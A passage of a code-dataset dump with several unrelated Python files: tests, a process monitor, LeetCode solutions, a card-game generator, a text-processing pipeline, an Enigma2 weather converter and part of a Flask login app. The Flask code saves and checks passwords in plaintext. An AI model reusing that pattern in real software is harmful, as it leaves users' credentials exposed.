mock_alias_mappings = HashableDict({\"a\": \"b\", \"b\": \"c\", \"c\": \"a\"})\n result = resolve_alias(\"a\", mock_alias_mappings)\n assert result == (None, \"a\", HashableList([\"a\", \"b\", \"c\"]))\n\n\ndef test_parse_version_returns_correct_values():\n \"\"\"Test limits of version parsing\"\"\"\n assert parse_version(\"\") is None\n assert parse_version(\"1\") is None\n assert parse_version(\"v1\") is None\n assert parse_version(\"v1.0\") is None\n assert parse_version(\"v1.0\") is None\n assert parse_version(\"1.0.0\") == semver.VersionInfo(1, 0, 0)\n assert parse_version(\"v1.0.0\") == semver.VersionInfo(1, 0, 0)\n\n\ndef test_match_version_returns_correct_value():\n \"\"\"Test limits of matching version\"\"\"\n version_set = (\"0.0.0\", \"0.0.1\", \"1.0.0\", \"1.0.1\", \"1.1.0\", \"2.0.0\")\n assert match_version(\"alias\", version_set) is None\n assert match_version(\"\", version_set) is None\n assert match_version(\"3\", version_set) is None\n assert match_version(\"2\", version_set) == semver.VersionInfo.parse(\"2.0.0\")\n assert match_version(\"1\", version_set) == semver.VersionInfo.parse(\"1.1.0\")\n assert match_version(\"1.0\", version_set) == semver.VersionInfo.parse(\"1.0.1\")\n assert match_version(\"0\", version_set) == semver.VersionInfo.parse(\"0.0.1\")\n","sub_path":"src/nvshim/core/tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":8661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"148033318","text":"#encoding=utf-8\nimport psutil\nimport time\nimport sys\nimport os\n \n\"\"\"\n这个脚本用于监控某个进程的CPU和内存使用情况,将信息记录到文件中\n\"\"\"\n \nif __name__ == '__main__':\n \"\"\"参数1:进程PID 参数2:保存的文件名(可选) 参数3:时间间隔(可选) \n \"\"\"\n pid = sys.argv[1]\n file_name = sys.argv[2] if len(sys.argv) > 2 else 'Test.txt'\n interval = float(sys.argv[3]) if len(sys.argv) > 3 else 10\n p = psutil.Process(int(pid))\n try:\n\n while True:\n f = open(file_name, 'a')\n f.write('time: %s\\tcpu percent: %f\\tmemory usage:%d\\n' % (time.strftime('%Y-%m-%d %H:%M:%S',time.localtime(time.time())),\n p.cpu_percent(interval=1.0),\n p.memory_info()[0]))\n print (p.name())\n print (os.path.basename('./../jre/jre/bin/java -Xbootclasspath/a:./../lib/boot.jar -classpath ./../lib/bootstrap.jar:./../lib/extensions.jar:./../lib/util.jar:./../l'))\n f.close()\n # 每一段时间记录一次进程的CPU和内存使用信息\n time.sleep(interval)\n except KeyboardInterrupt:\n # 中断退出\n print ('Exit!')\n finally:\n f.close()\n","sub_path":"testcpu.py","file_name":"testcpu.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"476553701","text":"\"\"\"\n350. Intersection of Two Arrays II\n\n\nGiven two arrays, write a function to compute their intersection.\n\nExample 1:\n\nInput: nums1 = [1,2,2,1], nums2 = [2,2]\nOutput: [2,2]\nExample 2:\n\nInput: nums1 = [4,9,5], nums2 = [9,4,9,8,4]\nOutput: [4,9]\nNote:\n\nEach element in the result should appear as many times as it shows in both arrays.\nThe result can be in any order.\nFollow up:\n\nWhat if the given array is already sorted? How would you optimize your algorithm?\nWhat if nums1's size is small compared to nums2's size? Which algorithm is better?\nWhat if elements of nums2 are stored on disk, and the memory is limited such that you cannot load all elements into the memory at once?\n\n\"\"\"\n\n\"\"\"\nfollow up\n\nIf only nums2 cannot fit in memory, put all elements of nums1 into a HashMap, read chunks of array that fit into the memory, and record the intersections.\n\nIf both nums1 and nums2 are so huge that neither fit into the memory, sort them individually (external sort), then read 2 elements from each array at a time in memory, record intersections.\n\n\"\"\"\n\n#hash table\n#time complexityL O(n) space complexity: O(n + m)\n\n\nclass Solution:\n def intersect(self, nums1, nums2):\n \"\"\"\n :type nums1: List[int]\n :type nums2: List[int]\n :rtype: List[int]\n \"\"\"\n hash1 = {}\n hash2 = {}\n for num in nums1:\n hash1[num] = hash1.get(num, 0) + 1\n for num in nums2:\n hash2[num] = hash2.get(num, 0) + 1\n res = []\n for num in hash1:\n if num in hash2:\n res.extend([num] * min(hash1[num], hash2[num]))\n\n return res\n\n#two pointers also works\n\n#2020/03/30\n#Runtime: 44 ms, faster than 80.99% of Python3 online submissions for Intersection of Two Arrays II.\n#Memory Usage: 14.1 MB, less than 5.72% of Python3 online submissions for Intersection of Two Arrays II.\n\nclass Solution:\n def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n res = []\n nums1.sort()\n nums2.sort()\n i1, i2 = 0, 0\n while i1 < len(nums1) and i2 < len(nums2):\n if nums1[i1] < nums2[i2]:\n i1 += 1\n elif nums1[i1] > nums2[i2]:\n i2 += 1\n else:\n res.append(nums1[i1])\n i1 += 1; i2 += 1\n return res\n\n# 2021/09/17\n# Runtime: 57 ms, faster than 40.56% of Python3 online submissions for Intersection of Two Arrays II.\n# Memory Usage: 14.4 MB, less than 69.86% of Python3 online submissions for Intersection of Two Arrays II.\n\n# 经典哈希表。将频数的最小值记录下来。\n\nclass Solution:\n def intersect(self, nums1: List[int], nums2: List[int]) -> List[int]:\n counts1, counts2 = {}, {}\n for num in nums1:\n counts1[num] = counts1.get(num, 0) + 1\n for num in nums2:\n counts2[num] = counts2.get(num, 0) + 1\n ans = []\n for num in counts1:\n if num in counts2:\n ans += [num] * min(counts1[num], counts2[num])\n return ans","sub_path":"0350. Intersection of Two Arrays II.py","file_name":"0350. Intersection of Two Arrays II.py","file_ext":"py","file_size_in_byte":3042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"257945921","text":"import json\nfrom random import shuffle,choice\nfrom scenario import Scenario\nfrom professions import Professions\nfrom health import Health\nfrom bio_characteristic import BIO\nfrom additional_info import AInfo\nfrom personality_traits import PTrains\nfrom hobbies import Hobbies\nfrom phobias import Phobias\nfrom special_info import SInfo\n\nclass Game:\n def __init__(self,player_number):\n self.__player_number = player_number\n # def classes objects\n self.__scenario_obj = Scenario()\n self.__professions_obj = Professions()\n self.__health_obj = Health()\n self.__bio_characteristic_obj = BIO()\n self.__additional_info_obj = AInfo()\n self.__personality_trains_obj = PTrains()\n self.__hobbies_obj = Hobbies()\n self.__phobias_obj = Phobias()\n self.__special_info_obj = SInfo()\n\n self.__load_data()\n self.__shuffle_data()\n self.__create_players()\n self.__make_players_files()\n\n def __load_data(self):\n print(\"Loading scenarios...\")\n self.__scenario = self.__scenario_obj.get_scenarios()\n print(\"Loading scenarios - completed!\")\n\n print(\"Loading professions...\")\n self.__professions = self.__professions_obj.get_professions()\n print(\"Loading professions - completed!\")\n\n print(\"Loading diseases (health)...\")\n self.__diseases = self.__health_obj.get_diseases()\n print(\"Loading diseases (health) - completed!\")\n\n print(\"Loading bio. characteristics...\")\n self.__bio_characteristics = self.__bio_characteristic_obj.get_bio_info(self.__player_number)\n print(\"Loading bio. characteristics - completed!\")\n\n print(\"Loading additional information...\")\n self.__additional_info = self.__additional_info_obj.get_additional_info()\n print(\"Loading additional information - completed!\")\n\n print(\"Loading personality trains...\")\n self.__personality_trains = self.__personality_trains_obj.get_peronality_trains()\n print(\"Loading personality trains - completed!\")\n\n print(\"Loading hobbies...\")\n self.__hobbies = self.__hobbies_obj.get_hobbies()\n print(\"Loading hobbies - completed!\")\n\n print(\"Loading phobias...\")\n self.__phobias = self.__phobias_obj.get_phobias()\n print(\"Loading phobias - completed!\")\n\n print(\"Loading special information...\")\n self.__special_info = self.__special_info_obj.get_special_info()\n print(\"Loading special information - completed!\")\n def __shuffle_data(self):\n # Scenarios\n keys = list(self.__scenario.keys())\n shuffle(keys)\n self.__shuffled_scenario = dict()\n for key in keys:\n self.__shuffled_scenario.update({key:self.__scenario[key]})\n\n # Profs\n keys = list(self.__professions.keys())\n shuffle(keys)\n self.__shuffled_professions = dict()\n for key in keys:\n self.__shuffled_professions.update({key: self.__professions[key]})\n\n # Diseases\n keys = list(self.__diseases.keys())\n shuffle(keys)\n self.__shuffled_diseases = dict()\n for key in keys:\n self.__shuffled_diseases.update({key: self.__diseases[key]})\n\n # Bio\n shuffle(self.__bio_characteristics)\n self.__shuffled_bio_characteristics = self.__bio_characteristics\n\n # Additional info\n shuffle(self.__additional_info)\n self.__shuffled_additional_info = self.__additional_info\n\n # Personality traits\n shuffle(self.__personality_trains)\n self.__shuffled_personality_trains = self.__personality_trains\n\n # Hobbies\n keys = list(self.__hobbies.keys())\n shuffle(keys)\n self.__shuffled_hobbies = dict()\n for key in keys:\n self.__shuffled_hobbies.update({key: self.__hobbies[key]})\n\n # Phobias\n shuffle(self.__phobias)\n 
self.__shuffled_phobias = self.__phobias\n\n # Special info\n shuffle(self.__special_info)\n self.__shuffled_special_info = self.__special_info\n def __create_players(self):\n try:\n self.__players = []\n for i in range(self.__player_number):\n player = {}\n # prof\n key = choice(list(self.__shuffled_professions))\n player[\"Profession\"] = {key: self.__shuffled_professions[key]}\n del self.__shuffled_professions[key]\n # disease\n key = choice(list(self.__shuffled_diseases))\n player[\"Disease\"] = key\n del self.__shuffled_diseases[key]\n # bio\n key = choice(self.__shuffled_bio_characteristics)\n player[\"Bio.Characteristic\"] = key\n self.__shuffled_bio_characteristics.remove(key)\n # additional info\n key = choice(self.__shuffled_additional_info)\n player[\"Additional information\"] = key\n self.__shuffled_additional_info.remove(key)\n # personality traits\n key = choice(self.__shuffled_personality_trains)\n player[\"Personality trait\"] = key\n self.__shuffled_personality_trains.remove(key)\n # hobbies\n key = choice(list(self.__shuffled_hobbies))\n player[\"Hobby\"] = {key: self.__shuffled_hobbies[key]}\n del self.__shuffled_hobbies[key]\n # phobias\n key = choice(self.__shuffled_phobias)\n player[\"Phobia\"] = key\n self.__shuffled_phobias.remove(key)\n # Special information\n key = choice(self.__shuffled_special_info)\n player[\"Special information\"] = key\n self.__shuffled_special_info.remove(key)\n\n self.__players.append(player)\n except ValueError as error:\n print(\"Error \", error)\n\n def __make_players_files(self):\n for i in range(self.__player_number):\n with open(f\"players/{i}.txt\",\"w\",encoding='utf-8') as file:\n for key in self.__players[i].keys():\n if key == \"Profession\":\n prof_key = list(self.__players[i][key].keys()) # prof name\n file.write(f\"Your profession - {prof_key[0]}\\n\")\n file.write(f\"Description of your profession - {self.__players[i][key][prof_key[0]]}\\n\")\n if key == \"Disease\":\n disease_key = self.__players[i][key]\n file.write(f\"Your state of health - {disease_key}\\n\")\n if key == \"Bio.Characteristic\":\n bio_key = list(self.__players[i][key].keys())\n file.write(f\"Your sex - {bio_key[0]}\\n\")\n file.write(f\"Your age - {self.__players[i][key][bio_key[0]]}\\n\")\n if key == \"Additional information\":\n file.write(f\"Your additional information card number - {self.__players[i][key]}\\n\")\n if key == \"Personality trait\":\n file.write(f\"Your personality trait - {self.__players[i][key]}\\n\")\n if key == \"Hobby\":\n hobby_key = list(self.__players[i][key].keys())\n file.write(f\"Your hobby - {self.__players[i][key][hobby_key[0]]} (hobby number - {hobby_key[0]})\\n\")\n if key == \"Phobia\":\n file.write(f\"Your phobia - {self.__players[i][key].capitalize()}\\n\")\n if key == \"Special information\":\n file.write(f\"Your special information card number - {self.__players[i][key]}\\n\")\n\nif __name__ == '__main__':\n print(\"Number of players cannot be lower than 6 or higher than 12, and cannot be odd (7, 9, 11)\\n\")\n player_number = int(input(\"Enter number of players: \"))\n game = Game(player_number)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"265029266","text":"# --------------------------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for license information.\n# --------------------------------------------------------------------------------------------\n\nimport os\nfrom msrest.serialization import Model\n\n\nclass ApplicationTemplateInfo(Model):\n \"\"\"A reference to an Azure Batch Application Template.\n\n :param str file_path: The path to an application template file. This can\n be a full path, or relative to the current working directory. Alternatively\n a relative directory can be supplied with the 'current_directory' argument.\n A ValueError will be raised if the supplied file path cannot be found.\n :param dict parameters: A dictory of parameter names and values to be\n subtituted into the application template.\n \"\"\"\n\n _validation = {\n 'file_path': {'required': True},\n }\n\n _attribute_map = {\n 'file_path': {'key': 'filePath', 'type': 'str'},\n 'parameters': {'key': 'parameters', 'type': 'object'},\n }\n\n def __init__(self, **kwargs):\n super(ApplicationTemplateInfo, self).__init__(**kwargs)\n self.file_path = kwargs.get('file_path', None)\n if not os.path.isfile(self.file_path):\n current_directory = kwargs.get('current_directory', \".\")\n self.file_path = os.path.abspath(os.path.join(current_directory, str(self.file_path)))\n self.parameters = kwargs.get('parameters', None)\n\n # Rule: Template file must exist\n # (We do this in order to give a good diagnostic in the most common case, knowing that this is\n # technically a race condition because someone could delete the file between our check here and\n # reading the file later on. We expect such cases to be rare.)\n try:\n with open(self.file_path, 'r'):\n pass\n except EnvironmentError as error:\n raise ValueError(\"Unable to read the template '{}': {}\".format(self.file_path, error))\n","sub_path":"azext/batch/models/application_template_info.py","file_name":"application_template_info.py","file_ext":"py","file_size_in_byte":2122,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"74800027","text":"import json\nimport os\nimport re\nimport threading\nfrom collections import defaultdict\nfrom io import BytesIO\nfrom itertools import count as iter_count\nfrom bson import ObjectId\nimport jieba\nimport numpy as np\nimport openpyxl\nfrom models import Paragraph\nfrom opencc import OpenCC\nfrom openpyxl.cell.cell import ILLEGAL_CHARACTERS_RE\nfrom pipeline import *\nfrom PyMongoWrapper.dbo import DbObject\n\n\nclass Passthrough(PipelineStage):\n \"\"\"直接通过\n \"\"\"\n\n def resolve(self, p : Paragraph) -> Paragraph:\n return p\n\n\nclass TradToSimpChinese(PipelineStage):\n \"\"\"繁体中文转为简体中文\n \"\"\"\n\n t2s = OpenCC('t2s')\n\n def resolve(self, p: Paragraph) -> Paragraph:\n p.content = TradToSimpChinese.t2s.convert(p.content)\n if p.lang == 'cht': p.lang = 'chs'\n return p\n\n\nclass JiebaCut(PipelineStage):\n \"\"\"使用结巴分词生成检索词\n \"\"\"\n\n def __init__(self, for_search=False, **kwargs):\n \"\"\"\n Args:\n for_search (bool): 是否用于搜索(会产生冗余分词结果)\n \"\"\"\n self.for_search = for_search\n\n def resolve(self, p: Paragraph) -> Paragraph:\n p.tokens = list(jieba.cut_for_search(p.content) if self.for_search else jieba.cut(p.content))\n return p\n\n\nclass WesternCut(PipelineStage):\n \"\"\"西文分词\n \"\"\"\n \n def resolve(self, p: Paragraph) -> Paragraph:\n p.tokens = [_.lower() for _ in re.split(r'[^\\w]', p.content)]\n return p\n\n\nclass KeywordsFromTokens(PipelineStage):\n \"\"\"将词袋中的分词结果加入到检索词中并删除词袋\n \"\"\"\n \n def resolve(self, p: Paragraph) -> Paragraph:\n for w in set(p.tokens):\n p.keywords.append(w)\n delattr(p, 'tokens')\n p.save()\n return p\n\n\nclass FilterPunctuations(PipelineStage):\n \"\"\"过滤标点符号\n \"\"\"\n \n re_punctuations = re.compile(r'[,。「」·;□■•●『』[]【】()\\s\\(\\)、“”‘’《》——\\-!?\\.\\?\\!\\,\\'\\\":\\/\\\\\\n\\u3000…]')\n\n def resolve(self, p: Paragraph) -> Paragraph:\n p.content = FilterPunctuations.re_punctuations.sub('', p.content)\n return p\n\n\nclass AccumulateParagraphs(PipelineStage):\n \"\"\"将遍历的段落保存起来以备下一步骤使用(通常用于导出)\n \"\"\"\n\n def __init__(self):\n self.paragraphs = []\n self._lock = threading.Lock()\n\n def resolve(self, p : Paragraph):\n with self._lock:\n self.paragraphs.append(p)\n\n def summarize(self, *args):\n return self.paragraphs\n\n\nclass Export(PipelineStage):\n \"\"\"结果导出为文件\n \"\"\"\n\n re_excel_illegal_chars = re.compile(ILLEGAL_CHARACTERS_RE)\n\n def __init__(self, format='xlsx', limit=0) -> None:\n \"\"\"导出结果\n\n Args:\n format (xlsx|json|csv): 输出格式。\n limit (int, optional): 最多导出的记录数量,0表示无限制。\n \"\"\"\n self.format = format\n self.limit = limit\n\n def summarize(self, r):\n\n def json_dump(v):\n try:\n return json.dump(v)\n except:\n return str(v)\n\n def _value_for_excel(x):\n if isinstance(x, str):\n x = Export.re_excel_illegal_chars.sub('', x)\n if x.startswith('='):\n x = \"'\" + x\n elif isinstance(x, ObjectId):\n return str(x)\n elif x is None or isinstance(x, (int, float)):\n pass\n elif isinstance(x, list):\n x = ','.join([str(_value_for_excel(_)) for _ in x])\n else:\n x = json_dump(x)\n return x\n\n def _value_for_csv(x):\n if x is None:\n return \"\"\n elif isinstance(x, ObjectId):\n return str(x)\n elif isinstance(x, (int, float)):\n return str(x)\n if not isinstance(x, str): x = str(x)\n if ',' in x:\n x = x.replace('\"', '\"\"')\n x = '\"' + x + '\"'\n return x.replace('\\n', '')\n \n def _get_header_and_records(r):\n if isinstance(r, dict):\n return [], r.items()\n else:\n r = list(r)\n if not r:\n return [], []\n if isinstance(r[0], DbObject):\n r = [_.as_dict() for _ in r]\n if isinstance(r[0], 
dict):\n h = list(r[0].keys())\n if 'keywords' in h: h.remove('keywords')\n if '_id' in h: h.remove('_id')\n r = [[_.get(k) for k in h] for _ in r]\n else:\n h = []\n return h, r\n\n if self.format == 'json':\n return {\n '__file_ext__': 'json',\n 'data': BytesIO(json_dump(r).encode('utf-8'))\n }\n \n elif self.format == 'csv':\n h, r = _get_header_and_records(r)\n if h: r.insert(0, h)\n\n s = ''\n for l in r:\n s += ','.join([_value_for_csv(_) for _ in l]) + '\\n'\n return {\n '__file_ext__': 'csv',\n 'data': BytesIO(s.encode('utf-8'))\n }\n\n elif self.format == 'xlsx':\n h, r = _get_header_and_records(r)\n\n wb = openpyxl.Workbook()\n ws = wb.active\n\n if h:\n ws.append(h)\n for l in r:\n ws.append([_value_for_excel(_) for _ in l])\n\n buf = BytesIO()\n wb.save(buf)\n return {\n '__file_ext__': 'xlsx',\n 'data': buf.getvalue()\n }\n\n\nclass AutoSummary(PipelineStage):\n \"\"\"中文自动摘要\n \"\"\"\n def __init__(self, count) -> None:\n \"\"\"\n Args:\n count (int): 摘要中的句子数量\n \"\"\"\n self.count = count\n\n def resolve(self, p: Paragraph) -> Paragraph:\n from textrank4zh import TextRank4Keyword, TextRank4Sentence\n tr4s = TextRank4Sentence()\n tr4s.analyze(text=p.content, lower=True, source='all_filters')\n p.summary = '\\n'.join([\n item.sentence\n for item in tr4s.get_key_sentences(num=self.count)\n ])\n return p\n\n\nclass Counter:\n\n class _CounterNum:\n\n def __init__(self):\n self._number_of_read = 0\n self._counter = iter_count()\n \n def value(self):\n value = next(self._counter) - self._number_of_read\n self._number_of_read += 1\n return value\n\n def inc(self, d=1):\n for i in range(d):\n next(self._counter)\n\n def __init__(self) -> None:\n self._d = defaultdict(Counter._CounterNum)\n\n def __getitem__(self, key):\n return self._d[key]\n\n def as_dict(self):\n return {\n k: v.value() for k, v in self._d.items()\n }\n\n\nclass NgramCounter(PipelineStage):\n \"\"\"N-Gram 计数\n \"\"\"\n\n def __init__(self, n : int, lr=False):\n \"\"\" N-Gram\n\n Args:\n n (int): 最大字串长度\n lr (bool): 是否同时记录左右字符计数\n \"\"\"\n if lr: n += 2\n self.n = n\n self.lr = lr\n self.ngrams = Counter()\n self.ngrams_lefts = defaultdict(Counter)\n self.ngrams_rights = defaultdict(Counter)\n \n def resolve(self, p : Paragraph) -> Paragraph:\n ngrams = [' ' * i for i in range(self.n)]\n for c in p.content:\n for i in range(self.n):\n ngrams[i] = (ngrams[i] + c)[-i-1:]\n self.ngrams[ngrams[i]].inc()\n if self.lr:\n for i in range(2, self.n):\n left, word, right = ngrams[i][0], ngrams[i][1:-1], ngrams[i][-1]\n self.ngrams_lefts[word][left].inc()\n self.ngrams_rights[word][right].inc()\n\n def summarize(self, returned):\n self.ngrams = self.ngrams.as_dict()\n self.ngrams_lefts = {k: v.as_dict() for k, v in self.ngrams_lefts.items()}\n self.ngrams_rights = {k: v.as_dict() for k, v in self.ngrams_rights.items()}\n","sub_path":"pipelines/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":8236,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
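The Counter helper in the record above builds its tallies out of itertools.count rather than a plain integer, an idiom commonly relied on to make increments effectively atomic under CPython's GIL. A standalone sketch of the same trick, mirroring _CounterNum's read-compensation:

    from collections import defaultdict
    from itertools import count as iter_count

    class TallyNum:
        # inc() advances an itertools.count iterator; value() reads the running
        # total while compensating for the fact that each read consumes one tick.
        def __init__(self):
            self._reads = 0
            self._counter = iter_count()

        def inc(self, d=1):
            for _ in range(d):
                next(self._counter)

        def value(self):
            v = next(self._counter) - self._reads
            self._reads += 1
            return v

    tally = defaultdict(TallyNum)
    tally["the"].inc()
    tally["the"].inc(2)
    print(tally["the"].value())  # 3
    print(tally["the"].value())  # 3 again: reads are compensated for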
+{"seq_id":"140677441","text":"# RWeather Converter\n# xml from rambler weather\n# Copyright (c) 2boom 2014 (10.09.2014)\n# v.0.2-r0\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see .\n# %S - city, %T - temp, %C - condition, %W - windspeed, %H- humiditydata\n\nfrom Tools.Directories import fileExists, pathExists\nfrom Components.Converter.Converter import Converter\nfrom Components.Element import cached\nfrom Components.Console import Console as iConsole\nfrom Components.Language import language\nfrom os import environ\nfrom Poll import Poll\nimport gettext\nimport time\nimport os\n\ntime_update = 20\ntime_update_ms = 3000\n\nclass RWeather(Poll, Converter, object):\n\tcity = 0\n\ttemp = 1\n\tcondition = 2\n\twindtxt = 3\n\twindspeed = 4\n\thumiditytxt = 5\n\thumiditydata = 6\n\tpicon = 7\n\tallinfo = 8\n\tformat = 9\n\n\tdef __init__(self, type):\n\t\tConverter.__init__(self, type)\n\t\tPoll.__init__(self)\n\t\tif type == \"city\":\n\t\t\tself.type = self.city\n\t\telif type == \"temp\":\n\t\t\tself.type = self.temp\n\t\telif type == \"condition\":\n\t\t\tself.type = self.condition\n\t\telif type == \"windtxt\":\n\t\t\tself.type = self.windtxt\n\t\telif type == \"windspeed\":\n\t\t\tself.type = self.windspeed\n\t\telif type == \"humiditytxt\":\n\t\t\tself.type = self.humiditytxt\n\t\telif type == \"humiditydata\":\n\t\t\tself.type = self.humiditydata\n\t\telif type == \"picon\":\n\t\t\tself.type = self.picon\n\t\telif type.startswith('Format:'):\n\t\t\tself.type = self.format\n\t\t\tself.paramert_str = type \n\t\telse:\n\t\t\tself.type = self.allinfo\n\t\tself.iConsole = iConsole()\n\t\tself.poll_interval = time_update_ms\n\t\tself.poll_enabled = True\n\n\tdef write_none(self):\n\t\twith open('/tmp/rweather.xml', 'w') as noneweather:\n\t\t\tnoneweather.write('None')\n\t\tnoneweather.close()\n\n\tdef get_xmlfile(self):\n\t\tself.iConsole.ePopen(\"wget -P /tmp -T2 'http://informers.rambler.ru/weather/geoid//?version=4' -O /tmp/rweather.xml\", self.control_xml)\n\t\n\tdef control_xml(self, result, retval, extra_args):\n\t\tif retval is not 0:\n\t\t\tself.write_none()\n\n\t@cached\n\tdef getText(self):\n\t\tinfo = weather_str = 'NA'\n\t\trweather = {'city':'', 'temp':'', 'condition':'', 'windtxt':'', 'windspeed':'',\\\n\t\t\t'humiditytxt':'', 'humiditydata':'', 'picon':'', 'allinfo':''}\n\t\tif fileExists(\"/tmp/rweather.xml\"):\n\t\t\tif int((time.time() - os.stat('/tmp/rweather.xml').st_mtime)/60) >= time_update:\n\t\t\t\tself.get_xmlfile()\n\t\telse:\n\t\t\tself.get_xmlfile()\n\t\tif not fileExists('/tmp/rweather.xml'):\n\t\t\tself.write_none()\n\t\t\treturn info\n\t\tif fileExists('/tmp/rweather.xml') and open('/tmp/rweather.xml').read() is 'None':\n\t\t\treturn info\n\t\tif fileExists('/tmp/rweather.xml'):\n\t\t\tin_file = open('/tmp/rweather.xml').read().replace('\\n', ', ').split('>')\n\t\t\tif len(in_file) is 7:\n\t\t\t\trweather['picon'] = in_file[1].split('/')[-1].split('.')[0]\n\t\t\t\tweather_str = 
in_file[3].split('[')[-1].strip(']').split()\n\t\t\t\tweather_data = in_file[3].split('[')[-1].strip(']').split(',')\n\t\t\t\tfor i in range(3, len(weather_data[0].split())):\n\t\t\t\t\trweather['city'] += weather_data[0].split()[i] + ' '\n\t\t\t\trweather['city'] = rweather['city'].strip()\n\t\t\t\trweather['temp'] = '%s%sC' % (weather_data[-3].split()[0][:-3],unichr(176).encode(\"latin-1\"))\n\t\t\t\tfor i in range(1, len(weather_data[-3].split())):\n\t\t\t\t\trweather['condition'] += weather_data[-3].split()[i].strip(',') + ' '\n\t\t\t\trweather['condition'] = rweather['condition'].strip()\n\t\t\t\trweather['windtxt'] = weather_data[-2].split()[0]\n\t\t\t\trweather['windspeed'] = '%s, %s %s' % (weather_data[-2].split()[-1], weather_data[-2].split()[-3], weather_data[-2].split()[-2])\n\t\t\t\trweather['humiditytxt'] = weather_data[-1].split()[-2]\n\t\t\t\trweather['humiditydata'] = weather_data[-1].split()[-1]\n\t\t\t\tfor i in range(3,len(weather_str)):\n\t\t\t\t\trweather['allinfo'] += weather_str[i] + ' '\n\t\t\t\trweather['allinfo'] = rweather['allinfo'].strip()\n\t\tif self.type is self.city:\n\t\t\tinfo = rweather['city']\n\t\tif self.type is self.temp:\n\t\t\tinfo = rweather['temp']\n\t\tif self.type is self.condition:\n\t\t\tinfo = rweather['condition']\n\t\tif self.type is self.windtxt:\n\t\t\tinfo = rweather['windtxt']\n\t\tif self.type is self.windspeed:\n\t\t\tinfo = rweather['windspeed']\n\t\tif self.type is self.humiditytxt:\n\t\t\tinfo = rweather['humiditytxt']\n\t\tif self.type is self.humiditydata:\n\t\t\tinfo = rweather['humiditydata']\n\t\tif self.type is self.picon:\n\t\t\tinfo = rweather['picon']\n\t\tif self.type is self.allinfo:\n\t\t\tinfo = rweather['allinfo']\n\t\tif self.type is self.format:\n\t\t\t# %S - city, %T - temp, %C - condition, %W - windspeed, %H- humiditydata\n\t\t\treturn self.paramert_str.replace('Format:', '').replace('%S', rweather['city']).replace('%T', rweather['temp']).replace('%C', rweather['condition'])\\\n\t\t\t\t.replace('%W', rweather['windspeed']).replace('%H', rweather['humiditydata'])\n\t\treturn info\n\ttext = property(getText)\n\n\tdef changed(self, what):\n\t\tConverter.changed(self, (self.CHANGED_POLL,))\n","sub_path":"usr/lib/enigma2/python/Plugins/Extensions/SetupNeutronHD/components/RWeather.py","file_name":"RWeather.py","file_ext":"py","file_size_in_byte":5287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"114749581","text":"from flask import render_template, flash, redirect, session, url_for, request, g, jsonify\nfrom flask_login import login_user, logout_user, current_user, login_required\nfrom app import app, login_manager, db\nfrom forms import LoginForm, SignupForm\nfrom models import User, UserAssignments, Assignment, AssignmentTest\nfrom testcode import get_test_str, check_test_results\nfrom emails import send_email_users_new_asgn, send_email_admin_late_soln\nfrom config import SECRET_KEY\nimport datetime\n\n\n@app.before_request\ndef before_request():\n \"\"\"\n Better access to current_user.\n \"\"\"\n g.user = current_user\n\n\n@app.route('/')\n@app.route('/index')\ndef index():\n return render_template(\"partials/home.html\")\n\n\n@app.route('/login', methods=['GET', 'POST'])\ndef login():\n if g.user is not None and g.user.is_authenticated:\n return redirect(url_for('index'))\n login_form = LoginForm()\n signup_form = SignupForm()\n if login_form.validate_on_submit():\n user = User.query.filter_by(username=login_form.username.data).first()\n if user:\n # TODO: make password check more secure\n if user.password == login_form.password.data:\n login_user(user, remember=login_form.remember_me.data)\n return redirect(request.args.get('next') or url_for('index'))\n flash('Invalid username or password. Try again.')\n return redirect(url_for('login'))\n return render_template(\"partials/login.html\",\n login_form=login_form,\n signup_form=signup_form)\n\n\n@app.route('/signup', methods=['POST'])\ndef signup():\n signup_form = SignupForm()\n if signup_form.validate_on_submit():\n if User.query.filter_by(username=signup_form.username.data).first() \\\n or User.query.filter_by(email=signup_form.email.data).first():\n flash('Username or email already taken. 
Try again.')\n return redirect(url_for('login'))\n user = User(\n username=signup_form.username.data,\n email=signup_form.email.data,\n password=signup_form.password.data\n )\n db.session.add(user)\n db.session.commit()\n login_user(user, remember=signup_form.remember_me.data)\n return redirect(request.args.get('next') or url_for('index'))\n return redirect(url_for('login'))\n\n\n@login_manager.user_loader\ndef load_user(user_id):\n return User.query.get(int(user_id))\n\n\n@app.route('/logout')\n@login_required\ndef logout():\n logout_user()\n return redirect(url_for('index'))\n\n\n@app.route('/profile')\n@login_required\ndef profile():\n solved_asgns = g.user.get_solved_assignments()\n unsolved_visible_asgns = g.user.get_unsolved_visible_assignments()\n return render_template(\"partials/profile.html\",\n user=g.user,\n solved_asgns=solved_asgns,\n unsolved_visible_asgns=unsolved_visible_asgns)\n\n\n@app.route('/resources')\ndef resources():\n return render_template(\"partials/resources.html\")\n\n\n@app.route('/editor/<asgn_id>')\ndef editor(asgn_id):\n assignment = Assignment.query.filter(Assignment.id == asgn_id).first()\n user_soln = ''\n if g.user.has_solved(assignment):\n with open('./results/' + str(g.user.id) + '_' + str(asgn_id) + '.py', 'r') as f:\n user_soln = f.read()\n return render_template(\"partials/editor.html\",\n assignment=assignment,\n 